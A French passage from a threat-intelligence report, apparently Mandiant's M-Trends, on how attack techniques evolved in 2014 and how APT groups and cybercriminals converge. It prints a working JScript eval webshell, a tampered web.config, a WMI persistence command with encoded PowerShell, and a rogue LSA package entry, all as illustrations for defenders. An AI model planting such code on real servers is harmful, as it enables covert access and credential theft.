  15. 15. www.mandiant.com 13 TENDANCE 3 : L’ÉVOLUTION DU CYCLE DE VIE DES ATTAQUES La majorité des incidents sur lesquels nous enquêtons suivent un schéma classique que nous appelons « cycle de vie des attaques ». L es équipes de sécurité et les attaquants semblent constamment jouer au chat et à la souris : à peine les uns déploient-ils de nouveaux dispositifs de défense qu’aussitôt, les autres modifient leurs tactiques. Cette tendance s’est poursuivie en 2014, année marquée entre autres par une hausse des détournements des connexions VPN visant à maintenir un accès permanent aux environnements des entreprises victimes. Nous avons également observé l’émer- gence de techniques élaborées permettant d’é- chapper aux systèmes de détection, sans oublier de nouveaux outils et tactiques destinés à voler des identifiants et à se déplacer latéralement dans les environnements compromis. Détournements des connexions VPN L’accès au VPN d’une entreprise offre deux avantages décisifs aux attaquants : 1) celui de s’implanter dans un environnement sans avoir à y installer de portes dérobées et 2) celui de se fondre dans la masse en imitant les comporte- ments d’utilisateurs autorisés. Ainsi, une fois sur le réseau, les groupes d’attaque que nous avons étudiés se sont immédiatement tournés vers les dispositifs VPN et leurs identi- fiants d’accès. En ce sens, 2014 fut une nouvelle année record : jamais nous n’avions recensé autant de cas d’accès malveillants aux VPN des entreprises. La plupart de nos investigations ont fait apparaître deux grands vecteurs d’attaques des VPN : • Authentification à facteur unique : si l’accès au VPN ne s’effectuait que par nom d’utilisateur et mot de passe valides, les attaquants n’ont eu qu’à réutiliser des iden- tifiants récupérés dans le domaine Active Directory ou les systèmes compromis des utilisateurs. • Authentification à deux facteurs basée sur des certificats : dès lors que le deuxième facteur d’authentification était un certificat numérique propre à chaque utilisateur, les attaquants se sont servis d’outils très courants comme Mimikatz pour extraire ces certificats des systèmes compromis. Dans certains scénarios, le manque de sécurité dans la distribution des certificats VPN (pièce jointe d’e-mails non-cryptés ou plates-formes ouvertes de partage de fichiers) leur a facilité la tâche. Dans des cas plus rares, les attaquants ont eu recours à des exploits zero-day pour contourner le processus d’authentification VPN. Nous cite- rons évidemment « Heartbleed », une vulnéra- bilité dans l’extension Heartbeat du protocole TLS (Transport Layer Security) qui a fait les gros titres en avril dernier. Cette faille permettait en effet aux attaquants de récupérer des buffers mémoire de 64 Ko sur les serveurs et périphé- riques vulnérables, et ce à partir d’une simple requête. Au moment de la découverte de Heartbleed, l’im- pact de cette vulnérabilité et les probabilités de vol de données sensibles (clés de cryptage, iden- tifiants, etc.) ont fait débat chez les spécialistes. Mais leurs pires craintes se sont hélas réalisées. Ainsi, quelques semaines après le signalement, nous avons enquêté sur une attaque au cours de laquelle cette faille avait servi à détourner les sessions d’utilisateurs authentifiés pour accéder au réseau de l’entreprise ciblée, et ce sans aucun identifiant. Les semaines suivantes, les attaquants répétèrent l’opération sur les infrastructures VPN d’autres entreprises.
  16. 16. 14 www.mandiant.com Les nouvelles du frontM-Trends Dans tous ces cas de figures, les journaux des connexions VPN ont gardé des traces révélatrices des modes opératoires. Ainsi, les adresses IP en provenance des sessions utilisateurs authenti- fiées changeaient rapidement entre différents blocs d’adresses, différents fournisseurs IP et différentes zones géographiques. Dissimulation de malwares sous le nez des victimes En 2014, la détection de malwares s’est de nouveau apparentée à une course à l’armement entre attaquants et défenseurs. Ainsi, on a assisté à l’émergence de nouvelles techniques permettant aux attaquants de camoufler leurs actions et de dissimuler des malwares sur les systèmes infectés. Dissimulation de webshells Connues sous le nom de webshells, les portes dérobées basées sur le Web sont une forme de malware apparu il y a une dizaine d’années. Aujourd’hui, leurs capacités à échapper aux sys- tèmes de détection des hôtes et des réseaux en font un outil privilégié pour les attaques ciblées. Figure 4 : Nouvelles techniques d’attaque observées durant les enquêtes Mandiant Compromission initiale Implantation Escalade des privilèges Reconnaissance interne Mission accomplie Déplacement latéral Maintien de présence Détournement de connexions VPN Jamais Mandiant n’a observé autant de cas d’accès malveil- lants aux VPN des entreprises. Packages de sécurité malveillants Les attaquants ont profité de l’extensi- bilité des packages de sécurité Windows pour charger des portes dérobées et des enregistreurs de mots de passe. Dissimulation de webshells Les attaquants n’ont cessé d’innover pour déployer et dissimuler des malwares sur le Web. Mandiant a observé plusieurs techniques, dont les suivantes : • Implantation sur les serveurs de scripts shell exploitant le cryptage SSL pour contourner les dispositifs de surveillance réseau • Intégration d’une ligne de script shell ‘eval’ sur des pages Web légitimes • Fichiers de configuration serveurs modifiés pour charger des fichiers DLL malveillants Exploitation du système WMI et du langage PowerShell Pour maintenir leur présence, col- lecter des données et se déplacer latéralement dans les environne- ments infiltrés, les attaquants ont eu de plus en plus recours aux composants Windows WMI et PowerShell. Attaques Kerberos Après s’être approprié des privilèges d’administrateur de domaine, les attaquants ont lancé des attaques Kerberos « golden ticket » pour s’authentifier comme n’importe quel utilisateur privilégié – même après réinitialisation des mots de passe du domaine. Mots de passe en clair Les attaquants ont exploité des varian- tes recompilées de l’utilitaire Mimikatz pour récupérer des mots de passe en clair dans la mémoire, tout en échap- pant aux détections anti-virus. À mesure que les défenses se renforcent, les attaquants s’adap- tent et innovent. En 2014, nous avons constaté l’émergence de nouvelles techniques de piratage à chaque étape du cycle de vie des attaques. En voici les grandes lignes. Nous avons étudié plusieurs cas où les atta­ quants étaient parvenus à installer leurs webshells sur des serveurs cryptant leurs communications par SSL (Secure Layer Socket). En conséquence, toutes les requêtes émises vers et depuis la porte dérobée étaient cryptées par la propre clé privée (légitimement installée) du serveur. L’architecture réseau de la victime n’ayant pas été configurée pour contrôler le trafic SSL, les actions des attaquants sont passées totalement inaperçues. Nous prévoyons la poursuite de cette tendance, à l’heure où de plus en plus d’entreprises adop- tent le SSL pour crypter l’ensemble de leurs services Web déployés sur Internet. Autre technique furtive observée : le détour- nement des pages Web légitimes à l’aide de scripts shell ‘eval’. Conçus pour exécuter du code à partir d’un paramètre de requête HTTP, ces mini-scripts de quelques dizaines d’octets se dissimulent facilement dans un fichier HTML plus long.
  17. 17. www.mandiant.com 15 composants OS basiques et exécuter des com- mandes. Par ailleurs, WMI fournit un framework d’événements capable de déclencher des appli- cations (y compris des malwares) en fonction des changements d’état d’objets spécifiques. Ces dernières années, nous n’avions rencontré que peu de cas d’utilisation de WMI pour échap- per aux détections. Ceci s’explique probable- ment par la complexité des interactions WMI et la disponibilité de techniques de persistance plus simples et suffisamment efficaces pour rester incognito. Toutefois, en 2014, quelques groupes se sont servis de WMI pour maintenir une présence discrète dans les environnements infiltrés. Cette technique consiste à créer trois objets WMI (généralement à l’aide du langage Power- Shell): • Filtre d’événements : cet objet interroge le système sur un événement récurrent (par exemple une heure donnée ou le nombre de secondes écoulées depuis le démarrage de la machine) qui pourrait servir de mécanisme de persistance. • Consommateur d’événements : cet objet exécute un script ou une commande spéci- fique permettant de « consommer » l’événe- ment. En général, les attaquants créent soit des consommateurs d’événements de ligne de commande (pour l’exécution d’une com- mande arbitraire), soit des consommateurs de script actif (pour l’exécution de scripts VBScript). • Liaison consommateur-filtre : cet objet assure l’exécution d’un consommateur d’événements lorsqu’un filtre est activé. Figure 5 : Exemple de webshell ‘eval’ <%@ Page Language=”Jscript”%><%eval(Request.Item[“p1”],”unsafe”);%> Figure 6 : Extrait de fichier web.config modifié <!--HTTP Modules --> <modules> <add type=”Microsoft.Exchange.Clients.BadModule” name=”BadModule” /> </modules> Ainsi, pour les requêtes HTTP ordinaires, la page Web infectée s’affiche normalement. Mais dès lors que l’attaquant utilise un certain paramètre dans sa requête, la commande ‘eval’ se met à parser et exécuter le code malveillant. La figure 5 montre un script shell ‘eval’ qui peut être soit autonome, soit incorporé à une autre page Web. Le client webshell de l’attaquant devra intégrer le code malveillant dans le paramètre de requête p1. Dernier exemple de technique d’attaque par malware sur le Web : la modification du fichier de configuration (web.config) d’un serveur Web exécutant les services Microsoft IIS (Internet Information Services). Particulièrement astu- cieuse, cette technique pousse le serveur infec- té à charger un module HTTP malveillant. La figure 6 montre un extrait « désinfecté » d’un fichier web.config modifié. Ce changement déclenche le chargement du fichier BadModule.dll à partir d’un répertoire de modules partagé et son utilisation pour le traite- ment de toutes les requêtes Web ultérieures. Ainsi, le malware parse et récupère les contenus de toutes les requêtes Web envoyées au serveur – y compris les identifiants utilisateurs. La figure 6 est un extrait de fichier web.config « désinfecté ». Dans l’attaque réelle, le nom du module simule une vraie DLL Microsoft. Pour échapper à toute détection, l’attaquant modifie les horodatages du malware et du fichier de configuration. WMI comme vecteur de persistance Composant majeur de Windows, WMI (Windows Management Instrumentation) intègre un large éventail d’interfaces et de fonctionnalités de gestion système. Les applications et langages comme PowerShell et VBScript utilisent WMI pour collecter des données, interagir avec des
  18. 18. 16 www.mandiant.com Les nouvelles du frontM-Trends Figure 7 : Comment les attaquants utilisent WMI pour maintenir une présence persistante WMI interroge régulièrement le système sur la requête dans le filtre d’événements. Dans cet exemple, la condition associée au filtre est remplie tous les jours à 08h05.2 Une fois le filtre activé, WMI lance automatiquement le consommateur d’événe- ments qui lui est rattaché. Cet exemple montre une partie du consommateur de ligne de commande exécutant un script PowerShell avec un code malveillant fourni sous forme d’argument encodé en Base64. 3 L’attaquant crée trois objets WMI à partir de commandes Powershell : un consom- mateur qui exécute une commande ou un script, un filtre qui interroge le système sur un événement récurrent et une liaison pour relier le filtre au consommateur. 1 Espace de noms WMI (rootsubscription) Consommateur d’événements « Exécuter ce script ou cette commande... » Filtre d’événements « Rechercher cet événement récurrent dans le système... » Liaison consommateur-filtre « Utiliser ce filtre pour déclencher ce consommateur » Set-WmiInstance SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 08 AND TargetInstance.Minute = 05 GROUP WITHIN 60 CommandLineTemplate="C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe –NonInteractive –enc SQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAALQBDAG8AbQBwAHUAdABl..."
  19. 19. www.mandiant.com 17 La figure 8 montre un exemple de syntaxe PowerShell permettant de créer un consomma- teur WMI de ligne de commande, chargé à son tour d’exécuter le programme powershell.exe – avec en argument une chaîne encodée en Base64. N’importe quel code PowerShell (par exemple un programme de téléchargement ou une porte dérobée standard) pourra être ajouté à cette chaîne, et ce sans aucun fichier de script sur le disque. Rattaché à un filtre d’événements approprié, ce consommateur pourra s’exécuter de manière récurrente. La persistance établie via WMI place les analystes forensiques devant plusieurs défis. Non seulement les commandes PowerShell permettent aux attaquants de créer des filtres et des consommateurs exécutables à la fois en local et à distance, mais contrairement à de nombreux mécanismes de persistance, ils ne laissent aucune trace dans le registre. Par ailleurs, les objets sont stockés sur disque dans une base de données complexe (le référen- tiel WMI object.data) et parfois difficile à analyser. Enfin, Windows n’audite les filtres et consomma- teurs nouvellement créés ou déclenchés que lorsque la journalisation de niveau débogage est activée. Or, cette journalisation n’est ni paramé­ trée par défaut, ni destinée à être utilisée à long terme en raison du volume important d’événe- ments qu’elle génère.5 Packages de sécurité malveillants À plusieurs occasions, les attaquants se sont ser- vis des packages de sécurité LSA (Local Security Authority) de Windows pour charger automa- tiquement des malwares tout en échappant aux systèmes de détection. Les packages de sécurité sont un ensemble de fichiers DLL chargés par la LSA au démarrage du système et configurés sous le paramètre « Valeurs » de la clé de registre HKLM SYSTEMCurrentControlSet ControlLsa. Chacune de ces valeurs contient une liste de chaînes référençant des noms de fichiers (sans extension) à charger depuis %SYSTEMROOT%system32. Étant automatiquement chargés via le fichier LSASS.EXE, les packages LSA permettent à un attaquant doté de privilèges administrateur d’ajouter ou modifier les valeurs nécessaires pour maintenir la présence d’un fichier DLL malveillant. Ainsi, une de nos enquêtes menées en 2014 a révélé une modification de la valeur Packages de sécurité pour maintenir la présence du chargeur d’une porte dérobée multi-étapes, tspkgEx.dll, sur le système.6 La figure 9 illustre la valeur modifiée. Ce changement contraint le programme LSASS.EXE à lancer le fichier DLL tspkgEx (C: WINDOWSsystem32tspkgEx.dll) au démarrage du système. 5 Organisés lors de la conférence Mandiant MIRcon 2014, les débats consacrés à WMI et PowerShell fournissent de plus amples détails et des études de cas sur ces techniques – ainsi que des recommandations pour la détection et l’analyse forensique. Pour visionner les présentations, rendez-vous sur https://dl.mandiant.com/EE/library/MIRcon2014/ MIRcon_2014_IR_Track_There%27s_Something_About_WMI.pdf et https://dl.mandiant.com/EE/ library/MIRcon2014/MIRcon_2014_IR_Track_ Investigating_Powershell_Attacks.pdf. 6 Dans cet exemple, nous avons « désinfecté » le nom de la DLL. Figure 8 : Extrait de commande PowerShell pour la création d’un consommateur WMI Set-WmiInstance -Namespace “rootsubscription” -Class ‘CommandLineEventConsum- er’ -Arguments @{ name=’EvilWMI’;CommandLineTemplate=”C:WINDOWSSystem32 WindowsPowerShellv1.0powershell.exe –enc SQBuAHYAbwBrAGUALQBDAG8AG8A- bQ...<SNIP>”;RunInteractively=’false’} Figure 9 : Modification de la clé HKLMSYSTEMCurrentControlSetControlLsaSecurity Packages pour le chargement du malware PACKAGES DE SÉCURITÉ (avant modification): kerberos msv1_0 schannel wdigest tspkg pku2u PACKAGES DE SÉCURITÉ (après modification): kerberos msv1_0 schannel wdigest tspkg pku2u tspkgEx
  20. 20. 18 www.mandiant.com Les nouvelles du frontM-Trends L’extensibilité de LSA permet d’utiliser des pack- ages de sécurité personnalisés pour traiter les identifiants des utilisateurs lors d’une ouverture de session. Or, un package de sécurité malveil- lant peut détourner cette fonctionnalité pour capturer des mots de passe en clair au moment de la connexion. Une de nos enquêtes menées en 2014 a mis en lumière ce mode opératoire par lequel un atta- quant a chargé un malware sous forme de pack- age de sécurité qui lui a permis de faire main basse sur des mots de passe. Largement dispo- nible, le kit d’attaque Mimikatz7 intègre égale- ment un outil, mimilib ssp, capable de voler des mots de passe une fois lancé.8 Vol de mots de passe en toute simplicité Très répandus, les outils de vol d’identifiants ont grandement facilité la collecte de mots de passe et l’escalade de privilèges dans les environne- ments Windows. En 2014, les auteurs d’attaques ciblées ont eu principalement recours à deux techniques : • La méthode « pass-the-hash » pour s’authentifier à l’aide de hashs NTLM volés • L’outil Mimikatz pour récupérer les mots de passe en clair dans la mémoire À défaut de neutraliser complètement ces méthodes, Microsoft est parvenu à en réduire l’efficacité sur ses systèmes Windows Server 2012 R2 et Windows 8.1. Or, la plupart des entreprises avec lesquelles nous avons travaillé l’an dernier exploitaient encore des domaines fonctionnels Windows Server 2008 et des terminaux Windows 7. De fait, « pass-the-hash » continue de faire des ravages, notamment dans les environnements où les mots de passe des administrateurs locaux sont communs à tout un groupe de systèmes. Quant à Mimikatz, il va encore plus loin en récu- pérant les mots de passe Windows en clair que l’OS stocke en mémoire pour gérer les diffé- rentes formes d’authentifications uniques (SSO). Sur le poste de travail d’un salarié, le risque peut se limiter au seul mot de passe du compte de son domaine. Mais dans le cas d’un serveur partagé gérant de nombreuses sessions de connexion interactives, par exemple via le protocole RDP (Remote Desktop Protocol) ou l’utilitaire PsExec, le nombre de mots de passe exposés sera beaucoup plus élevé. Les entreprises victimes n’ont pu que constater l’incroyable vitesse avec laquelle l’infection de quelques systèmes pouvait se propager à un domaine Active Directory complet. Presque toutes nos investigations ont révélé l’incapacité des logiciels anti-virus des entre­ prises à stopper Mimikatz, et ce malgré la réputation et le vaste champ d’action de cet outil. Pour échapper aux systèmes de détection, les attaquants n’ont souvent eu qu’à modifier et recompiler le code source. Mais ils ont aussi déployé des variantes de l’outil, comme le script PowerShell « Invoke-Mimikatz » qui s’exécute uniquement en mémoire. L’année 2014 a également vu l’émergence d’un certain nombre d’attaques visant Kerberos, le mécanisme d’authentification par défaut des domaines Windows récents. Au premier rang de ces attaques, on trouve le « golden ticket » Mimikatz, qui permet à un intrus ayant com- promis un contrôleur de domaine d’émettre un ticket TGT (ticket-granting ticket) pour n’importe quel utilisateur. Presque toutes nos investigations ont révélé l’incapacité des logiciels anti- virus des entreprises à stopper Mimikatz, et ce malgré la réputation et le vaste champ d’action de cet outil. Pour échapper aux systèmes de détection, les attaquants n’ont souvent eu qu’à modifier et recompiler le code source. 7 https://github.com/gentilkiwi/mimikatz5 8 Lors du MIRCon 2014, Matt Graeber a présenté ses nouvelles analyses sur les packages de sécurité malveillants et les mécanismes permettant de les détecter et d’en limiter l’exploitation. À consulter sur https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_Analysis_of_Malicious_ SSP.pdf
  21. 21. www.mandiant.com 19 Ce « ticket en or » porte bien son nom puisqu’il peut être généré hors ligne, rester valide pour une durée indéterminée et être utilisé pour usurper n’importe quel compte – même après la réinitialisation d’un mot de passe. Une fois ce ticket en main, un attaquant peut se réintroduire sur un environnement « assaini » et se réappro- prier instantanément les privilèges administra- teur du domaine. À défaut de pouvoir éviter la compromission initiale, le seul moyen d’y remédier consiste à réinitialiser deux fois de suite le mot de passe krbtgt, nom du compte de service de distribution de clés Kerberos. Cette procédure permet d’effa- cer l’historique des mots de passe du compte et d’annuler tous les tickets Kerberos précédem- ment émis. Déplacements latéraux avec WMI et PowerShell Par le passé, les déplacements latéraux et exécu- tions de commandes d’attaque contre un envi- ronnement Windows combinaient généralement des utilitaires Windows intégrés (net, at, etc.), des malwares personnalisés, des scripts de commandes ou Visual Basic, et des outils d’admi- nistration courants comme PsExec. Prisées des attaquants du fait de leur fiabilité et de leur simplicité d’utilisation, ces techniques laissent cependant derrière elles bon nombre de traces et d’empreintes compromettantes. C’est ainsi qu’entre 2013 et 2014, nous avons observé une évolution manifeste des modes de déplacement latéral des groupes APT (Advanced Persistent Threat) que nous surveillons. Désor- mais, ces groupes ont davantage recours au système WMI et au langage PowerShell pour se déplacer latéralement, voler des identifiants et glaner des informations utiles dans les environ- nements Windows. De même, un grand nombre de chercheurs en sécurité et d’outils de tests d’intrusion ont adop- té le langage PowerShell ces dernières années. Cette généralisation a entraîné une plus grande diffusion publique d’informations et de codes source dont chaque camp profite pour se perfectionner. Nous avons décrit plus haut la manière dont les attaquants exploitent des événements WMI pour maintenir leur présence dans des environ­ nements compromis. Outre cette méthode, ils utilisent également l’outil de ligne de commande wmic.exe pour étendre les fonctionnalités de WMI aux scripts et à l’interface système (shell). WMI leur sert à se connecter à des systèmes distants, modifier le registre, accéder aux jour- naux d’événements et, plus important encore, exécuter des commandes. Hormis un événement d’ouverture de session initiale, les commandes WMI à distance ne laissent que très peu de preuves sur le système infiltré. Dans plusieurs cas analysés en 2014, les atta- quants se sont appuyés sur des commandes PowerShell à distance et des scripts en mémoire pour se déplacer latéralement et récupérer des données d’identification. Un code PowerShell peut s’exécuter en mémoire sans jamais passer par les disques du système infiltré, limitant ainsi toute forme de trace. De plus, les anciennes versions de PowerShell installées par défaut dans la plupart des environnements ne peuvent maintenir aucune piste d’audit détaillée du code exécuté. À RETENIR : Les auteurs d’APT ne cessent d’améliorer leurs outils et tactiques pour laisser un minimum de traces et échapper aux systèmes de détection. C’est pourquoi les entreprises ciblées doivent maintenir des dispositifs de surveillance en temps réel et d’analyse forensique post-incident sur tous leurs terminaux, sources de journaux et équipements réseau. Elles veilleront également à établir des seuils d’activité normale et à intervenir proactivement en cas d’écart pour garder un coup d’avance sur les attaquants.
  22. 22. 20 www.mandiant.com Les nouvelles du frontM-Trends N ous avons passé l’an dernier à enquêter sur des attaques qui nous ont permis de remonter jusqu’à la piste russe. Ces investigations ont toutefois révélé des zones d’ombre qui rendent très difficile la distinction entre les gangs de cybercriminels d’une part, et les groupes étatiques d’autre part. Dans ce contexte de fusion des divers outils et méthodes, vous devrez orienter votre analyse sur les inten- tions des attaquants pour en évaluer l’impact potentiel. Certaines des attaques ciblées à caractère fi- nancier que nous avons disséquées présentent une physionomie qui tient davantage des orga- nisations étatiques que du profil type du cyber- criminel opportuniste. La figure 10 en page 21 fait un point sur les croisements entre les groupes APT connus et les cas de cybercrimes que nous avons rencontrés en 2014. Évaluer l’intention dans un climat d’incertitude : une tâche délicate Étant donné ces chevauchements, les analystes doivent aborder leur décryptage des motiva- tions avec une grande ouverture d’esprit. En ce sens, il ne suffit pas de se pencher sur tel outil ou telle méthode de manière isolée. Certaines activités observées en Russie l’an passé mettent en évidence l’importance et la difficulté d’une analyse des objectifs finaux pour l’interprétation de leur démarche technique. En octobre 2014, nous avons exposé le détail des activités d’APT28, un groupe que nous soup- çonnons d’exfiltrer de l’intelligence politique et militaire au profit du gouvernement russe. Depuis des années, APT28 s’en prend à l’indus- trie de la défense, aux puissances étrangères, aux complexes militaires et aux organismes intergouvernementaux. Des chercheurs ont également révélé l’existence d’un autre groupe basé en Russie et qui, comme APT28, semble mener des activités d’espion- nage pour Moscou. Cette seconde filière est connue sous divers noms : “Sandworm Team,”9 “Quedagh”10 et “BE2 APT.”11 TENDANCE 4 : ENTRE CYBERCRIMINELS ET GROUPES APT, LA FRONTIÈRE S’ESTOMPE Les enquêtes menées l’an passé révèlent l’émergence d’une nouvelle tendance : les cybercriminels tendent à s’inspirer des méthodes des auteurs d’APT, tandis que de leur côté, ces derniers utilisent des outils déjà très en vogue chez les cybercriminels. Face à cette convergence, il devient impératif de bien cerner les motivations d’une attaque pour en évaluer l’impact et développer une stratégie de sécurité basée sur le risque. 9 Cyber Espionage Operators Sandworm Team Leverage CVE-2014-4114 Zero-Day.” iSight Partners. 14 octobre 2014. Web. 2 décembre 2014. 10 https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf 11 https://securelist.com/blog/research/67353/be2-custom-plugins-router-abuse-and-target-profiles/
  23. 23. www.mandiant.com 21 12 https://www.fireeye.com/blog/threat-research/2014/04/crimeware-or-apt-malwares-fifty-shades-of-grey.html 13 APT18 est également un groupe basé en Chine. Voir https://www2.fireeye.com/WBNR-14Q3HealthcareWebinar.html TACTIQUES EXEMPLES DE CROISEMENTS Ingénierie sociale L’ingénierie sociale n’est pas la chasse gardée des groupes APT. En 2014, certaines attaques à caractère financier ont eu recours au spearphishing et à ses e-mails ciblés, tant pour l’infection initiale que lors de tentatives de reprise de contrôle de l’environnement post-neutralisation. L’ingénierie sociale interactive représente une autre méthode utilisée à la fois chez les cyber- criminels et les groupes APT. Sur l’une de nos missions, une attaque à motivation financière était passée par des profils professionnels factices sur les réseaux sociaux. Le but : établir le contact avec les salariés de l’entreprise ciblée et les inciter à télécharger un malware d’installation d’une porte dérobée. De son côté, APT3, un groupe soupçonné de travailler pour une puissance étrangère, a créé de toutes pièces un personnage de femme d’affaires qu’il a ensuite utilisé pour contacter un collaborateur de sa cible sur un grand réseau social professionnel. Après trois semaines d’échanges de messages, “elle” a envoyé son “CV” à l’adresse e-mail personnelle de son interlocuteur – CV qui contenait en fait une porte dérobée du groupe APT3. Son travail de sape s’est également étendu à d’autres collaborateurs de l’entreprise par des questions de type « Quel est le nom de votre directeur informatique ? » ou « Vous utilisez quelle version de ce logiciel ? ». Outils et malwares personnalisés La création d’outils personnalisés a cours tant dans le milieu des APT que du cybercrime financier. Dans un cas précis, les cybercriminels ont même déployé plus de 60 variantes de malwares et d’uti- litaires qu’ils avaient améliorés au cours de plusieurs années de présence furtive dans l’environne- ment de la victime. Pour sa part, le groupe russe APT28 a passé ces sept dernières années à amélio- rer la flexibilité de ses malwares de manière à maintenir sa présence dans un environnement infecté. Crimeware On retrouve dans cette catégorie tous les toolkits accessibles gratuitement ou vendus à des fins lucratives. Le crimeware n’est cependant pas l’apanage des cybercriminels. Ainsi, un groupe sus- pecté de lancer des attaques APT depuis la Russie a utilisé un exploit zero-day pour installer des variantes de BlackEnergy, un toolkit très prisé des cybercriminels depuis des années. Dans un milieu comme dans l’autre, les outils d’accès distant sont omniprésents12 , preuve s’il en est que les outils eux-mêmes ne peuvent constituer le seul facteur déterminant dans l’attribution d’une attaque. Maintien de la persistance Le cybercrime n’est plus dominé par le « smash-and-grab », sorte de vol éclair avec effraction. En effet, si la persistance a longtemps été la signature des auteurs d’APT, qui maintiennent leur pré- sence dans un environnement jusqu’à l’accomplissement de leur mission, le cybercrime financier montre de plus en plus sa capacité à agir en sous-marin. Dans un cas précis, les cybercriminels sont passés par les registres de démarrage Windows pour lancer le malware qui leur a permis de main- tenir une présence incognito dans l’environnement. Dans un autre cas de figure, les malfaiteurs sont parvenus à agir secrètement pendant 5 ans avant d’être débusqués. Nous avons même obser- vé chez eux des tentatives de réimplantation dans l’environnement dont ils venaient d’être chassés. Étendue du vol de données Le vol de données s’opère sur une échelle plus large et sur des ensembles de données plus volu- mineux que jamais. Ainsi, les attaquants ont poursuivi leur offensive sur de vastes référentiels de données d’identification personnelle (PII, Personally Identifiable Information). Historiquement, ces vols de données étaient systématiquement imputés au milieu du cybercrime financier qui les utilisait soit pour ses propres activités frauduleuses, soit pour les revendre sur un marché sous- terrain. Or, les PII attirent désormais la convoitise des auteurs d’APT, et ce pour des raisons totalement étrangères à tout appât du gain. Pour preuve, nous avons mis au grand jour des vols de PII commis par le groupe APT18 – une activité qui sort de son périmètre d’action habituel.13 Figure 10 : La convergence des méthodes entre groupes APT et cybercriminels
  24. 24. 22 www.mandiant.com Les nouvelles du frontM-Trends 14 http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/ 15 https://www.virusbtn.com/conference/vb2014/abstracts/LM3-LipovskyCherepanov.xml 16 BlackEnergy offre un framework extensible qui permet aux hackers d’ajouter de nouvelles caractéristiques et fonctionnalités via des bibliothèques DLL (Dynamic Link Library). Chaque plugin DLL peut être codé pour un usage spécifique, puis stocké dans un fichier crypté. En surface, ils ont tous la même apparence, ce qui complique le décryptage des intentions du hacker. Très prisé des cybercriminels, BlackEnergy est souvent utilisé pour des attaques de déni de service (DDoS). (Voir http:// atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf; http://blogs.mcafee.com/business/ security-connected/evolving-ddos-botnets-1- blackenergy) 17 http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/ Le groupe ciblait manifestement les mêmes profils de victimes qu’APT28, avec toutefois quelques différences clés. À commencer par les exploits zero-day et les outils de cybercrime utilisés. On le soupçonne par ailleurs de s’être attaqué à des infrastructures critiques aux États-Unis.14, 15 Les analyses du malware et de l’infrastructure utilisés ont révélé que l’équipe Sandworm s’est servie du toolkit BlackEnergy16 pour cibler des victimes en Ukraine, faisant ainsi écho aux tensions actuelles avec la Russie. Le groupe aurait également déployé ce toolkit pour cibler des équipements SCADA (Supervisory Control and Data Acquisition), très présents dans les infrastructures critiques et les environnements industriels.17 De même, les outils de production de diverses industries se sont trouvés au cœur de la tempête. En revanche, les prototypes mis au point par ces entreprises et les réseaux contenant et trans- mettant des informations sensibles (financières et de propriété intellectuelle) n’ont pas été tou- chés. On peut donc en déduire que les attaques cherchaient des faiblesses à exploiter pour commettre des actes de sabotage. En faisant appel à du crimeware comme BlackEnergy, ils tentaient vraisemblablement de garder un certain degré d’anonymat. Ces différences ont-elles une importance ? Dans le monde de la sécurité, le débat reste ou- vert sur l’intérêt même de discerner les motiva- tions d’une attaque et de l’attribuer à tel ou tel auteur. Certains avancent le fait que d’un point de vue réseau, peu importe qui se cache derrière la compromission : il faut d’abord la stopper et l’éradiquer. De même, la convergence des outils et méthodes employés par les cybercriminels et les auteurs d’APT complique encore un peu plus la question autour de l’intention et de l’impact potentiel. Et l’on ne parle même pas des dénégations et manœuvres trompeuses des attaquants, des disparités dans les mesures de répression, ou des liens alambiqués que certains agents des pouvoirs publics entretiennent avec la pègre. Dans ce tableau pour le moins confus, le décryptage des intentions et motivations d’une attaque pourra guider votre intervention. Prenons l’exemple d’un groupe russe menant des activités de cyberespionnage au profit d’un gouvernement. Derrière des outils de crime- ware d’apparence classique, les attaquants chercheront en fait à accéder à distance à des pans entiers d’infrastructure critique aux États-Unis. On comprend dès lors qu’une telle attaque ne pourra pas être traitée de la même manière qu’une menace financière ordinaire, et ce malgré les similitudes dans l’arsenal utilisé. Le fait de savoir si un malware est un vecteur d’infection préalable à l’attaque d’un groupe étatique, ou une simple menace mineure aux effets bénins, changera sans aucun doute la nature de votre réaction et de votre interven- tion. De même, le vol de données orchestré par des cybercriminels exigera une réponse différente, compte tenu de l’immédiateté de l’impact — contrairement à l’espionnage d’État dans lequel l’usage de l’intelligence exfiltrée est beaucoup plus nébuleux. À RETENIR : Dans un contexte de convergence des outils, techniques et pro- cédures utilisés par les cybercriminels d’une part, et les auteurs d’APT d’autre part, vous devrez passer au crible les intentions et les motivations de chaque attaque. Seule cette rigueur d’analyse vous permettra de bien diagnostiquer l’impact potentiel d’un incident de sécurité, d’y répondre de manière adaptée et d’aligner votre stratégie de défense sur la typologie des menaces en présence.
  25. 25. www.mandiant.com 23 À l’heure où la cybersécurité prend le devant de la scène, les entreprises doivent aborder la question des vols de données sous un angle nouveau — non pas comme une source d’embarras et de crispation, mais bien comme une réalité économique. Ils devront pour cela anticiper et affronter les incidents de sécurité avec confiance. Or, cette attitude volontariste appelle à une nou- velle approche de la cybersécurité. Personne ne peut prévenir toutes les compromissions. Mais la prévention, la détection, l’analyse et la neutra- lisation rapides et efficaces des menaces les plus avancées vous permettront de vous prémunir vous-mêmes, vos clients et vos partenaires contre les conséquences désastreuses qui font la une des médias. La sécurité infaillible n’existe pas. Personne ne peut prévoir les nouvelles techniques d’infiltra- tion. Et comme 2014 nous l’a rappelé, aucun groupe d’attaque ne baissera pavillon sous le seul prétexte qu’un nouvel outil de sécurité est parvenu à le neutraliser. Il n’en reste pas moins qu’avec un bon dosage de technologies, d’intelligence et d’expertise, les entreprises peuvent entamer un processus de renforcement de leur sécurité. Ainsi, elles seront capables de s’adapter pour garder un coup d’avance sur les nouvelles menaces, les nou- veaux outils et les nouveaux moyens de compromission des réseaux. Si les méchants sont rusés, bien équipés et déterminés, il n’y a aucune raison que les gentils ne le soient pas aussi. CONCLUSION L’an dernier, les attaquants ont poursuivi leur mutation, à mesure qu’ils élargis- saient leur cible et modifiaient leurs modes opératoires. L’histoire est pourtant restée la même : 